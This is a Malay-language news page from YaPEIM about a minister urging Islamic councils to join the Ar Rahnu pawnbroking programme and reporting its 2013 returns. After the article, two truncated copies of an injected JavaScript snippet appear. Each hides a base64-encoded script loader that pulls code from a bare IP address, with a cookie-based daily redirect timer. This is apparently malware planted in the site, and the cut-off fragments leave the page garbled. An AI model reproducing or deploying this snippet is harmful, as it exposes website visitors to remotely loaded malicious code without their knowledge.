YaPEIM » Majlis Agama Islam disaran sertai program pajak gadai Ar Rahnu

Terkini

Majlis Agama Islam disaran sertai program pajak gadai Ar Rahnu

Majlis Penyerahan Keuntungan Pelaburan Program Mikro Kredit Ar-Rahnu di bawah YaPEIM 2013

KUALA LUMPUR, 2 MEI 2014: Majlis Agama Islam dan Tabung Baitulmal Negeri diajak menyertai program pajak gadai Islam Ar Rahnu di bawah Yayasan Pembangunan Ekonomi Islam Malaysia (YaPEIM) yang menyediakan peluang pelaburan, selain membantu masyarakat yang memerlukan.

Menteri di Jabatan Perdana Menteri, Mejar Jeneral Dato’ Seri Jamil Khir bin Hj Baharom (B) berkata, pulangan yang diterima menerusi pelaburan program itu juga masih tinggi jika dibandingkan dengan institusi kewangan lain, walau berdepan dengan pasaran emas tidak menentu.
Beliau mengumumkan pulangan pelaburan program Ar Rahnu YaPEIM yang dikendalikanBank Rakyat bagi tahun 2013, sebanyak 7.63 peratus, iaitu berjumlah RM10.9 juta membabitkan purata pelaburan RM143 juta.

“Selain itu, program ini walaupun melibatkan sistem Islam, masih mendapat sambutan dan minat golongan bukan Islam, dan ada cawangan tertentu mempunyai peratus pelanggan bukan Islam mencecah 59 peratus,” katanya.

Beliau berkata demikian selepas menyempurnakan Majlis Penyerahan Keuntungan Ar Rahnu tahun 2013 di Pejabat YaPEIM di Bangunan Grand Seosons Avenue.
Turut hadir Presiden yang juga Pengerusi Pemegang Amanah YaPEIM, Dato’ Abd Malek Awang Kechil dan Ketua Pengarahnya, Abibullah Samsudin.

Teks ucapan penuh YB Dato’ Seri Jamil Khir, klik disini.

Jamil Khir berkata, YaPEIM menyasarkan penambahan 24 cawangan, menjadikan jumlah keseluruhan cawangan di seluruh negara kepada 202 pada tahun 2014.

([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”

Top

Comments are closed.

Top